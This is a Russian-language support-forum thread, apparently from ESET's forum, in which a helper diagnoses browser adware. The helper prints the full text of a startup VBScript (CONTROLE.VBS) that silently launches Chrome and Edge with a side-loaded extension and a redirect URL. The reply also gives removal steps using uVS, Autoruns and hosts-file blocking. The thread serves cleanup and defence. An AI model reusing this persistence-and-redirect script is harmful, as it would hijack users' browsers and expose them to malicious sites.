[QUOTE]Kot Obormot написал:
P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ [/QUOTE]

На V.T в колонке: Behavior есть весть текст скрипта.

[CODE]1988 - c:/windows/system32/cscript.exe Controle.vbs
2264 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000
2312 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Crashpad --metrics-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48 [/CODE]

+
В общем с запуском системы запускался скрипт ( CONTROLE.VBS ) > браузер получал команду и выходил на сайт ХХХ с пере-направлением на другой сайт - и там уже этот сайт мог вам показывать всякое :)

Полное имя                  C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
Имя файла                   CONTROLE.VBS
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2022-02-17 20:18 [2021-04-06] Файл был чист на момент проверки.

                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
Размер                      649 байт
Создан                      01.04.2021 в 22:38:31
Изменен                     25.03.2021 в 17:20:04
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Доп. информация             на момент обновления списка
SHA1                        58367B32AAE4C92208268A1F4B50E37862FC0162
MD5                         0278DC59F174789C3D2AA24DD835FD3A
                           
#FILE#                      On Error Resume Next


Dim WShell
Set WShell = CreateObject("WScript.Shell")

WShell.Run "chrome.exe  --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0
WShell.Run "msedge.exe  --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0

Set WShell = Nothing


On Error Goto 0

                           
Ссылки на объект            
Ссылка                      C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP
---------------
Файл известен с 2021-04-06
И V.T. показывает, что он чист.
https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a­323a00fb456420162?nocache=1
-----------------
Для удаления CONTROLE.VBS
Скопируйте текст КОДа - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !


<code>

;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\­START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
apply

restart

</code>

В Хроме есть:  Экспорт и импорт параметров.
В сети есть информация.
-------------
Есть программа Autoruns https://www.comss.ru/page.php?id=1064
чтобы программа _???_ не запускалась достаточно снять [v] в чек боксе... и всё - программа не запуститься. ( после перезапуска системы )
+ там есть строка поиска...  
Если что-то непонятно - то лучше это не трогать. :)

Здесь можно скачать _портативную версию браузера: https://www.comss.ru/page.php?id=261
Посмотрите будет ли и там эта проблема.

Валерий Ермаков

Вам нужно обратиться в службу технической поддержки  ESET по адресу:  [email protected]

На форуме нет доступа к данным - лицензий.

Попробуйте в браузере поочерёдно отключать установленные расширения...
Возможно проблема в одном из них.
---------
Если и это не поможет...
Заблокируйте  проблемный сайт через файл Host


Откройте в текстовом редакторе файл hosts
C:\WINDOWS\system32\drivers\etc\hosts
Пропишите в файл строки:

127.0.0.1 seokitstore.com
127.0.0.1 http://здесь адрес

После
Перезагрузите PC
Оцените результат.

Если есть проблемы с доступом к файлу hosts.
Файл можно редактировать из безопасного режима системы.

Попробуйте в браузере поочерёдно отключать установленные расширения...
Возможно чудит одно из них.

Синхронизацию включать не надо...
Часто проблема именно в ней. т.е. почистили систему - а после синхронизации... проблема вернулась.
т.е. просто нужен новый лог в FRST

Нужны новые логи в FRST.
Сейчас синхронизация в браузере отключена ?